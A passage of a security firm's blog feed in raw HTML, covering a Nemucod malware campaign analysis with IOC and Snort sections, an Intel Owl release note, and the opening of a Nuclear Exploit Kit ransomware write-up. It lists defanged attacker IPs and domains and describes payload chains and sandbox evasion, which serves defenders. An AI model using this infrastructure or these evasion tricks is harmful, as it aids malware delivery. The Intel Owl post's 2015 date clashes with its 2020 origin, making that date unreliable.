        title=&quot;&quot;
        src=&quot;/website/static/1596cd1ed7e981fc72f84f492d155d35/cf8e5/JSNemucodM.png&quot;
        srcset=&quot;/website/static/1596cd1ed7e981fc72f84f492d155d35/804b2/JSNemucodM.png 384w,
/website/static/1596cd1ed7e981fc72f84f492d155d35/e5715/JSNemucodM.png 768w,
/website/static/1596cd1ed7e981fc72f84f492d155d35/cf8e5/JSNemucodM.png 1402w&quot;
        sizes=&quot;(max-width: 1402px) 100vw, 1402px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Even the JavaScript files are pretty much the same:
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1400px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/50c36cde6507437110286d563de6ebf4/2cefc/JSNemucodO.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 9.895833333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAQUlEQVR42n3LuwrAQAhE0f3/f1SMD7ASg6z1SiBlcqrLwCwRuR6ISEQT7j49e0R09/62VHUOzAwAZpaZ96uq9q8DNaNvXhR8EUEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucodO&quot;
        title=&quot;&quot;
        src=&quot;/website/static/50c36cde6507437110286d563de6ebf4/2cefc/JSNemucodO.png&quot;
        srcset=&quot;/website/static/50c36cde6507437110286d563de6ebf4/804b2/JSNemucodO.png 384w,
/website/static/50c36cde6507437110286d563de6ebf4/e5715/JSNemucodO.png 768w,
/website/static/50c36cde6507437110286d563de6ebf4/2cefc/JSNemucodO.png 1400w&quot;
        sizes=&quot;(max-width: 1400px) 100vw, 1400px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;However, this second campaign does not download an EXE file; instead, it downloads a DLL library which is then invoked by running rundll32.exe through the WScript.Shell ActiveX control. The DLL&apos;s entry point is the non-standard function name &quot;DLLRegisterServer&quot;. Once again, right after that, the malware uses the ADODB.Stream ActiveX control to open the decoy PDF file.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Campaign 1410DTIT&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The last campaign started hitting our sandbox early this morning, even if its name suggests that it probably started yesterday. This campaign uses a different naming for both the compressed file and its content, some examples being:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1406px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/8006219a9f116307a8f80f1b245a99f9/4a00e/JSNemucod3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20.572916666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAWklEQVR42o2OMQpAIQxDe//TOQiiiFYFtZOLdf7hn6BvCMkQEppzMnPvvZQCg3jOee+pARpjxBhzzs45lO+P2iBshhBQhnrv11pqhvbetdbWGmZTSiJi/KyqHx7M36jOYF79AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/8006219a9f116307a8f80f1b245a99f9/4a00e/JSNemucod3.png&quot;
        srcset=&quot;/website/static/8006219a9f116307a8f80f1b245a99f9/804b2/JSNemucod3.png 384w,
/website/static/8006219a9f116307a8f80f1b245a99f9/e5715/JSNemucod3.png 768w,
/website/static/8006219a9f116307a8f80f1b245a99f9/4a00e/JSNemucod3.png 1406w&quot;
        sizes=&quot;(max-width: 1406px) 100vw, 1406px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This campaign also downloads a DLL library which is invoked through rundll32.exe; the entry point is still &quot;DLLRegisterServer&quot; and the decoy PDF document is always the same.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The payload&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Execution of these campaigns in our Sandbox showed that the executable files downloaded by Nemucod are used to retrieve a Trojan Downloader called Fareit or Pony Downloader, which in turn downloads another set of executable files containing the Gozi infostealer. Interestingly enough, the computer is rebooted after a few instants, and Gozi starts phoning home only after the reboot. This technique may be used to avoid detection in sandboxed environments.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Trivia&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It looks like the bad guys made some mistakes in the setup of the Command &amp;#x26; Control servers used by Nemucod. During our analyses we found out that sometimes the servers were replying with a HTTP header indicating that the file being server was an application/x-dosexec; but better analysis of the payload only showed an internal error generated by the script that probably packs the file before serving it, as shown in the following picture.
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1332px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/c3e03910dc0de53cf77655240b934208/e5ca1/JSNemucod4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 74.47916666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAABYlAAAWJQFJUiTwAAACTUlEQVR42oWRa3OaQBiF+f8/pzOd1iYxMSJ3UMKdqMBaRAEBRZa79oV08qXTCfPMmbPLe+AsELwd6GvX3CLAcna252/8o3eIAcv1bW/vBbHjh2u0h7vmxjM3LqBZG3W7JzRz42iqY5qOYbigprnVVHf0lizbirJznOBw8Pf7Ad//PYJcV3/fEpr2flquUtM6O27uoWy9wWGEo1MZx1WSNpe8ya9NgduyanAJdHV9v98LjJfGmjD092wlpfIqWUoXy7oiVB6P5THEQVDFcVdXfVl2RQG0o36EMcaSZhOy4cUoDFF0Ppzg8f3tDnx5QVhQDIKWPUXNZCV10dX3izjCSVI1ddc0A3U90Lb9v2FO1gh65UpSJMuxbWdBgLOsTtN6OG9SgYmi8nSqzufmM/ZRC87MSArByK6qnFQ1gbxhpHFcQr5p+v8V/gzTEOZVD6a77gbdINP3ty+BcJ4XtPhGkOJ2tYxME35WZpipqg4toIKqJboOJtG0BDZ1I9X0BBgHUssKmeUbwSmeqiSiGClK4ro58vL1+gwG8H28Q1fXuYzLC0I5QlfPAy3C45mWZEK2d7isi7LG8I3bthurtX3f9YO2o2/77u9yBHqf85wSVgQjytR8RtMLcj6jFqQkCALPDcpxYHiOFThWFHieZWAJmzzLwgRPUzy8mWb5lx/f2Nfn2eQ7+TRhX6fzx5/0yyM1/cW8PC6eJgAzboIysyn9/MA8P1DTiSAtCUpU5yRFsTzFcMCCZgcz6ugHM5tTJM2SFHieF8TF65xmOUGx/gDYyCJ8OLD66wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/c3e03910dc0de53cf77655240b934208/e5ca1/JSNemucod4.png&quot;
        srcset=&quot;/website/static/c3e03910dc0de53cf77655240b934208/804b2/JSNemucod4.png 384w,
/website/static/c3e03910dc0de53cf77655240b934208/e5715/JSNemucod4.png 768w,
/website/static/c3e03910dc0de53cf77655240b934208/e5ca1/JSNemucod4.png 1332w&quot;
        sizes=&quot;(max-width: 1332px) 100vw, 1332px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IOCs&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Nemucod&apos;s C&amp;#x26;C domains from the first campaign (0710TIT):&lt;/strong&gt;&lt;/em&gt;
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1402px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/7974ea4cddbc2c4603e8fb85c65167cf/cf8e5/JSNemucod5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAABYlAAAWJQFJUiTwAAAAmUlEQVR42pWRSw6EIBBEuf/9UKIYE36CCErCDLCbinMAsRa9e1XV3UQIYYy5rquU8r316RahlI7juCyL1jqllHMut3pcCOd8GIZpmhhjcFnX1XtvrY0xPvIEGOB5nrdtCyHs+34cB+Z5ns8wMPDIB9xaq7WC6a2NbVEYMC6HQFhg7RcHA4xw5xyqovMLWEqJTKUUvvXv3P+qH4ZrwYMwpwUAAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/7974ea4cddbc2c4603e8fb85c65167cf/cf8e5/JSNemucod5.png&quot;
        srcset=&quot;/website/static/7974ea4cddbc2c4603e8fb85c65167cf/804b2/JSNemucod5.png 384w,
/website/static/7974ea4cddbc2c4603e8fb85c65167cf/e5715/JSNemucod5.png 768w,
/website/static/7974ea4cddbc2c4603e8fb85c65167cf/cf8e5/JSNemucod5.png 1402w&quot;
        sizes=&quot;(max-width: 1402px) 100vw, 1402px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Second campaign (0810DTIT):&lt;/strong&gt;&lt;/em&gt;
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1404px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/8b25c1dcc351e053cbb7fb006a43130b/f793b/JSNemucod6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.697916666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAVElEQVR42pWPMQoAIQwE/f/vUgSPqCCJ16QQIjnrE3+Q6YfZTb3396Kqe+8vQkLE1toYY85pZjE5X0opRMTMoXgCgOdSaz39mHwcETmH3X2tFZr9A2GMGafLTyUnAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/8b25c1dcc351e053cbb7fb006a43130b/f793b/JSNemucod6.png&quot;
        srcset=&quot;/website/static/8b25c1dcc351e053cbb7fb006a43130b/804b2/JSNemucod6.png 384w,
/website/static/8b25c1dcc351e053cbb7fb006a43130b/e5715/JSNemucod6.png 768w,
/website/static/8b25c1dcc351e053cbb7fb006a43130b/f793b/JSNemucod6.png 1404w&quot;
        sizes=&quot;(max-width: 1404px) 100vw, 1404px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Third campaign (1410DTIT):&lt;/strong&gt;&lt;/em&gt;
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1398px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2f212a5eafbe0ca5949049d98912e39e/82c1e/JSNemucod7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.854166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAgElEQVR42pXQSw4EERQF0Nr/9oSmEb/4hJAILYb9unoD6g7MTu59LmOMUgreEIJzrrW21vqc5aKUvu5wzoUQtdYHGAzG+H0n51xKeYChDTwhRGttrfXe994P/Q8zxmC2lBJuHmPMOU+bEUJQC5fD7Bjj3vsBhjZYC1+dUjpnf/wFwMOIFOPKaxsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod7&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2f212a5eafbe0ca5949049d98912e39e/82c1e/JSNemucod7.png&quot;
        srcset=&quot;/website/static/2f212a5eafbe0ca5949049d98912e39e/804b2/JSNemucod7.png 384w,
/website/static/2f212a5eafbe0ca5949049d98912e39e/e5715/JSNemucod7.png 768w,
/website/static/2f212a5eafbe0ca5949049d98912e39e/82c1e/JSNemucod7.png 1398w&quot;
        sizes=&quot;(max-width: 1398px) 100vw, 1398px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;C&amp;#x26;Cs for Gozi and Fareit/Pony Downloader&lt;/strong&gt;&lt;/em&gt;
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1402px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3dc4222467ab702d4b384ee87767ea25/cf8e5/JSNemucod8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.958333333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAVUlEQVR42pWPSwqAMAwFc//7BUITSgtCN9nYpq596gXM7Od9qLXWez9exhhrrf0bYuZSipnBnHNGREIWEfiqiohU7SPD+eRa65WEcBib8dzdMfvMcAMEwhjbq0Xt4QAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3dc4222467ab702d4b384ee87767ea25/cf8e5/JSNemucod8.png&quot;
        srcset=&quot;/website/static/3dc4222467ab702d4b384ee87767ea25/804b2/JSNemucod8.png 384w,
/website/static/3dc4222467ab702d4b384ee87767ea25/e5715/JSNemucod8.png 768w,
/website/static/3dc4222467ab702d4b384ee87767ea25/cf8e5/JSNemucod8.png 1402w&quot;
        sizes=&quot;(max-width: 1402px) 100vw, 1402px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Snort Signatures&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The following Snort signatures should help detect the execution of Nemucod; the first two of them will detect any request that looks like Nemucod&apos;s italian campaigns; the third and fourth will detect the server returning an executable or the decoy PDF.
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1264px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/986bbbb259318528c7a00931be298937/081d5/JSNemucod9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 98.17708333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAIAAAAC64paAAAACXBIWXMAABYlAAAWJQFJUiTwAAACAklEQVR42mXU2VIiQRAF0Pr/n0NEAUUWARk2I8QGNGSMmENdp1/Mh4zcKuvmrewuLy8vq9WKHo1G8/mcsdvtFovF09PT8/Mzg57NZlLL5ZKeTCb04+PjZrMpEoPBYDwe8yVyhssQVzedTtXQibtDGUPf62FRRff39xL9fl/OMbmHhwfZdHR4OBw6I+Uala+vr2W9XksHniI2eCAFYS5U3XaZVNFlv98Xibu7u2GV29tbrguhiO2GwNZrUYWr+58q5Xg8nk4n+nw+M+imad7e3kQ+Pj5ELpfL9/f3318iXlZVkAySxgx49AYMYG7YpsO2OA3dD9tIcpJvGDgzPAM37N9sj6v8sJ15tDCkydMIHBFx1eFJLzo3Ma6EtTsgFKghJtyCmmsVjKrkct1VFlfF6Xa7aO/1euxwTnDe6XRyoN2zDO+NCz4/Pz8Ri2Q6nId2+nA4hHbu19fX5b9gm1tCNdE+e0vCkyUPvXmFLBIXBHivbBusJcluBG3YBn5axQGay1AcXq9LEjJF22MpggIF4QkRuTPbnqW43rzdbsMB/PxQnVkEacHgzMeLJywgiL4SljVsqhyrMN7f38MizsJfm6ITLAFD550ykki7IYz2eaU8Hmpubm4AKdm1jBrmogX1Cv9Ze+Dzh0GVibxFycc1q5LXzzcQVqxk5jfqoYpxArtpmn/FliXsraKhsAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/986bbbb259318528c7a00931be298937/081d5/JSNemucod9.png&quot;
        srcset=&quot;/website/static/986bbbb259318528c7a00931be298937/804b2/JSNemucod9.png 384w,
/website/static/986bbbb259318528c7a00931be298937/e5715/JSNemucod9.png 768w,
/website/static/986bbbb259318528c7a00931be298937/081d5/JSNemucod9.png 1264w&quot;
        sizes=&quot;(max-width: 1264px) 100vw, 1264px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE 2015-10-16&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A better look at yesterday&apos;s traffic showed that the new campaigns were actually two: one with ID 1410DTIT and the other with ID 14IT10M. Looking at timestamps shows that 14IT10M was probably released a few hours after 1410DTIT. Both campaigns are already covered by the Snort signatures that we released yesterday, and that have been included in today&apos;s release by Emerging Threats.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Intel Owl 1.0.0 released]]></title><description><![CDATA[Certego's Open Source Intelligence solution to get threat intelligence data about file, IP or a domain from a single API at scale]]></description><link>https://www.certego.net/blog/news-intel-owl-released/</link><guid isPermaLink="false">news-intel-owl-released</guid><category><![CDATA[News]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intel Team Leader]]></dc:creator><pubDate>Wed, 14 Oct 2015 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/intelowlproject/IntelOwl&quot;&gt;Intel Owl&lt;/a&gt; is an Open Source Intelligence, or OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale. It integrates a number of analyzers available online and is for everyone who needs a single point to query for info about a specific file or observable.&lt;/p&gt;
&lt;p&gt;Born at the start of 2020 (announcement), this fresh and new tool was accepted as part of the Google Summer of Code under the hat of The Honeynet Project. Great improvements have been developed since the start of this project.&lt;/p&gt;
&lt;p&gt;Now, thanks to the ongoing collaboration with Google Summer of Code and The Honeynet Project, we are excited to announce release 1.0.0, with a completely new and revamped web interface and some new features in our API to help you better manage your threat intelligence data.&lt;/p&gt;
&lt;p&gt;You can read some more details about Intel Owl 1.0.0 in the &lt;a href=&quot;https://www.honeynet.org/2020/07/05/intel-owl-release-v1-0-0/&quot;&gt;official release announcement&lt;/a&gt;, co-authored by &lt;a href=&quot;https://twitter.com/mask0fmydisguis&quot;&gt;Eshaan Bansal&lt;/a&gt; (GSoC Student) and his mentor, our own &lt;a href=&quot;https://twitter.com/matte_lodi&quot;&gt;Matteo Lodi&lt;/a&gt;, and published on The Honeynet Project&apos;s blog.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Nuclear Exploit Kit serving new Ransomware variant]]></title><description><![CDATA[A few hours ago Certego's Incident Response Team detected a malware campaign serving a new Ransomware variant through Nuclear Pack Exploit Kit.]]></description><link>https://www.certego.net/blog/nuclear-exploit-kit-serving-new-ransomware-variant/</link><guid isPermaLink="false">nuclear-exploit-kit-serving-new-ransomware-variant</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><pubDate>Thu, 13 Aug 2015 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;A few hours ago Certego&apos;s Incident Response Team detected a malware campaign serving a new Ransomware variant through Nuclear Pack Exploit Kit.&lt;/p&gt;
&lt;p&gt;Compromised web sites redirect the user to the Exploit Kit&apos;s first step, located at IP address 85.143.218 .208. The domain name used for this first step varies over time, and some of the variants we saw are:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;mexicoss.everythingcannabis .biz
shift.boutiqueeuphoria .com&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The resource name, instead, does not seem to change:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;/customerss/detect.js&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The second step is located at IP address 62.76.180 .20 and some of the domain names we saw are:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;actually.murdererswelcome .com
utah.murwel .com&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In this case, the resources seem to mimic the behaviour of a search engine:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;/search?q=...&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/84781643e431bd2b711c44c8a8a69e23/5a190/NuclearExploitKit1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 79.94791666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACbUlEQVR42pVS2XKiUBTk//8irzPzkqjzMFUaJWETjVFUUCMBERdQke2yXJdpIDPPM1RXV997TnMWYN4GI0UZKWMFDAImk7GmaYvFHAFlPF4sFpqm4rKKlokjbTqdqRPm57fvPx4e6o+PjXqjUa/Xa7W/qD091Z5q9QrFDaJIaoBM3TB0ndF7vePgzXkfHGez2HULOA5xXXI8QJMD2In2TqFdN9rvE8/LCbnf7x/LD8aYqP6HHlurW5reL/SSpsA1ywquUOksq46XLMvjGGbMxcg9cz4PVlbQ6yvT6eL+D8/tdgPPZjOmKxvD4Wk0POi6s997/2HWNGaorEwjtiyMk223CSE0z68Vyk4vf/q9Unq7XAogdL3dNVVjlPHaWhHbJtgFsN2S3Q6rSatjBcdJXDfx/SwIcs9LvVMak9KsahvbTkwztO24wm6XwF8KLDv1vAwIQ4oWgCQpdkqvmHkO83Zlkvn8vFyGphnBs9nEEJst6ielOT8eM4jzOUPxKKJpQrP8rqLyeGpbVmIYoWFEVfOog7wgoL6flzo/nVL4cSTkgspZSrEwTVWZ96G1XEa6HiyXgaZ5qIwJj8ev7DimYfjlieOCw4gmCf3aNsymQaqeURyMt6zX5PMzxCdYof/ydVghesHCfJ8Gfh7G5cIGQ3NlRYZ5tjfR2o7A1jrc7WMHv+OhwN4hQZglKU0zjFohv6JtVBY57qXTETjulWW7otTvygLPS6IkcLwkSPwrJwliryvJEj/oyX1ZepOlfomeyDN8uymyz92XttBpip2WxD5DgEUWuiXikm0JnZbQbvLPTa7d5DqtIrn1S+bY33g3WuesYglhAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NuclearExploitKit1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/84781643e431bd2b711c44c8a8a69e23/5a190/NuclearExploitKit1.png&quot;
        srcset=&quot;/website/static/84781643e431bd2b711c44c8a8a69e23/804b2/NuclearExploitKit1.png 384w,
/website/static/84781643e431bd2b711c44c8a8a69e23/e5715/NuclearExploitKit1.png 768w,
/website/static/84781643e431bd2b711c44c8a8a69e23/5a190/NuclearExploitKit1.png 800w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The Exploit Kit serves a Flash SWF file with a &lt;a href=&quot;https://www.virustotal.com/gui/file/87349dc02449e9dd7f23675d75757657351010a4dc8b18705578e18bbcf35d80/detection/f-87349dc02449e9dd7f23675d75757657351010a4dc8b18705578e18bbcf35d80-1439549371&quot;&gt;0/56 detection rate on VirusTotal&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The execution of this exploit causes the download of a payload that is obfuscated by running a byte-wise XOR with a 7 bytes long key, as shown in the picture below.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/8375b949da85e15651390c01bd00192b/5a190/NuclearExploitKit2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
